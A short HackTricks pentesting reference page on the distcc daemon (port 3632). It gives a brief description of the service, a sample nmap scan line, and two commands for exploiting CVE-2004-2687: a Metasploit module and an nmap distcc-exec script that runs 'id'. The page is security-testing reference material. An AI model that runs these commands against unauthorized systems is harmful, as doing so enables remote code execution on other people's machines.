hacktricks/network-services-pentesting/3632-pentesting-distcc.md
carlospolop f0e09e3f54 social
2023-03-06 00:16:20 +01:00

3.9 KiB

HackTricks in 🐦 Twitter 🐦 - 🎙️ Twitch Wed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥

Basic Information

Distcc is designed to speed up compilation by taking advantage of unused processing power on other computers. A machine with distcc installed can send code to be compiled across the network to a computer which has the distccd daemon and a compatible compiler installed

Default port: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Exploitation

Check if it's vulnerable to CVE-2004-2687 to execute arbitrary code:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"

Shodan

I don't think shodan detects this service.

Resources

Post created by Álex B (@r1p)

HackTricks in 🐦 Twitter 🐦 - 🎙️ Twitch Wed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥